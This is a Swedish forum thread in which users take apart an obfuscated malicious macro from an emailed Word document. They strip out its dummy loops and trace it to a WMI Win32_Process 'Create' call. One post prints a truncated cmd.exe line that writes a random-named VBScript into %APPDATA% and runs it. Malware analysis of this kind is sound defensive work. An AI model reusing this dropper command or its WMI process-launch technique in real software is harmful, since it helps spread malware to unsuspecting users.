Fick ett virusdokument, koden postad här. KNÄCKT

TomasL · Inlägg av **TomasL** » 27 oktober 2016, 19:07:17

Fick ett worddokument i mailen i dag, naturligtvis måste det vara ett virus, så jag tänkte att på nått sätt måste man ju kunna ta reda på vad det gör.
Så jag extraherade makrot ur filen.
Men vete tusan vad det gör, men håll till godo.
Kanske någon av er kan komma på vad det hittar på.

Micke_s · Inlägg av **Micke_s** » 27 oktober 2016, 19:13:20

De har ju någon skum obfusication på g..
D0P är intressant...

Lennart Aspenryd

Kan det vara något för BitCoin eller bara rappakalja!

TomasL · Inlägg av **TomasL** » 27 oktober 2016, 19:17:14

Ja, förvisso, det sätter ju ihop en mycket lång sträng i slutändan, och det verkar som att D0P är en funktion som sedan körs.
Det verkar som att scriptet sätter i hop ett antal funktioner med hjälp av teckensekvenser, vilka körs på flera ställen.

Micke_s · Inlägg av **Micke_s** » 27 oktober 2016, 19:23:08

M9d0ghB2(86) tror jag blir V, så M9d0ghB2 är int to char typ..
Arrayn BA(LRR7F) sätts, dock verkar den inte användas någonstans...

Tror mer på att du ska lösa gåtan GetObject(AntG(GZvKu, Rl))...

TomasL · Inlägg av **TomasL** » 27 oktober 2016, 21:24:36

Verkar som att det är mycket dummykod, sannolikt enbart för att förvirra, som till exempel

Kod: Markera allt

UsI = 5
	
	If UsI > 26 Then
		UsI = 3
		Do
			UsI = UsI + 1
		Loop While UsI <= 229
	End If

koden innanför IFen kommer aldrig någonsin att köras, som jag tolkar det

Kod: Markera allt

RSYhN = 64
	
	If RSYhN > 25 Then
		RSYhN = 2
		Do While RSYhN <= 254
			RSYhN = RSYhN + 1
		Loop
	End If

RSYhN kommer alltid att vara 255.

Det finns väldigt många sådana här kodsekvenser.

jesse · Inlägg av **jesse** » 27 oktober 2016, 21:47:05

...om loopen optimeras bort.
Annars räknar den en stund och avslutar med 255. Finns ju ingen som helst mening med att utföra detta annat än att slösa på processorkraft?

TomasL · Inlägg av **TomasL** » 28 oktober 2016, 00:03:23

Exakt, över 60% av koden består av sådana loopar.
Gissar att det enda det går ut på är att förvirra.

Nåväl, jag har rensat bort all kod som inte gör någonting, och det har blivit lite mindre, dessutom har jag bytt ut alla slumpmässiga bokstavskombinationer i funktioner och variabler mot lite mer lättlästa namn

TomasL · Inlägg av **TomasL** » 28 oktober 2016, 00:12:35

Själva huvuddelen av viruset ligger i SubRutin1.
Där ligger en jättesträng på runt 15000 tecken, vilken på olika "smarta" sätt mannipuleras och sätts ihop med ett antal andra strängar, för att användas som argument till två VBA-funktioner:
GetObject()
och
CallByName()

Exakt vad som händer vet jag inte riktigt ännu.
Funderar på att klistra in det hela i ett worddokument, kommentera bort VBA-anropen, singelstega igenom det hela.
Dock funderar jag på om det är tillräckligt säkert, det borde ju onekligen vara det.
Synd att man inte kan sandboxa på ett enkelt sätt, eller går det att göra i Visual Studio tro.

TomasL · Inlägg av **TomasL** » 28 oktober 2016, 02:06:43

Ok, då är det knäckt.
Nästan i slutet av huvudfunktionen så anropas GetObject

Kod: Markera allt

Set Local18 = GetObject(Function8(LocalStr16, LocalStr17))

Bytte ut den raden med

Kod: Markera allt

Local18 = Function8(LocalStr16, LocalStr17)

vilket blir:

Kod: Markera allt

"winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2:Win32_Process"

Allra sist så anropas

CallByName Local18, Function8(LocalStr19, LocalStr20), 2, LocalStr21

Där

Kod: Markera allt

Local18 = "winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2:Win32_Process"

Kod: Markera allt

Function8(LocalStr19, LocalStr20),

Blir

Kod: Markera allt

"Create"

och

Kod: Markera allt

LocalStr21 = "cmd.exe /V /C set "Qo6EX=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM Xkl8OKcx" "FunCTIoN NTxOffuM(Iixy)" "X2UcU=50" "NTxOffuM=CHr(Iixy)" "F7hY6Hlv=92" "End FunCtiOn" "Nmc=70" "Cd7c0C" "FunCTiON SLLfd0Wr(Ydpf3Yj8)" "OG=22" "SLLfd0Wr=AsC(Ydpf3Yj8)" "AUEV="

Av någon anledning får jag inte med hela vb-scriptet, verkar som att lokalfönstret är begränsat i sin utskrift.
Nåväl.

Så uppenbarligen skapas en liten process med några rader VBS-kod, vad denna gör, har jag dock inte en susning om i nuläget

svanted · Inlägg av **svanted** » 28 oktober 2016, 06:23:54

man kan kanske köra den i en isolerad virtuell burk och kolla vad som händer?

TomasL · Inlägg av **TomasL** » 28 oktober 2016, 08:04:12

Jo, men då måste jag ha ytterligare en windows och en office licens.

Lennart Aspenryd

Tack TomasL för ditt försök att bena ut det hela.
Skall bli intressant att se om någon kan singelsteppa detta i en virtuell maskin.
Men tänk så mycket pyssel för ... Vad då?

TomasL · Inlägg av **TomasL** » 28 oktober 2016, 10:14:58

Tja, jag gissar att det är ett av dessa virus som krypterar allt, och så får du betala några tusenlappar för att få det hela upplåst.

rvl · Inlägg av **rvl** » 28 oktober 2016, 11:22:21

Så det var inte ett virus för att byta din signatr på EF.

Litet lustigt att där ingick så pass mycket ufyllnad, som inte gjorde nån "nytta". Men dethär var förvisso ingenting i Stuxnetklass.

Intressant dokumet, som jag såg nyligen:
http://topdocumentaryfilms.com/defeating-hackers/

Fick ett virusdokument, koden postad här. KNÄCKT

Fick ett virusdokument, koden postad här. KNÄCKT

Re: Fick ett virusdokument

Re: Fick ett virusdokument

Re: Fick ett virusdokument

Re: Fick ett virusdokument

Re: Fick ett virusdokument

Re: Fick ett virusdokument

Re: Fick ett virusdokument

Re: Fick ett virusdokument

Re: Fick ett virusdokument, koden extraherad och postad här.

Re: Fick ett virusdokument, koden postad här. KNÄCKT

Re: Fick ett virusdokument, koden postad här. KNÄCKT

Re: Fick ett virusdokument, koden postad här. KNÄCKT

Re: Fick ett virusdokument, koden postad här. KNÄCKT

Re: Fick ett virusdokument, koden postad här. KNÄCKT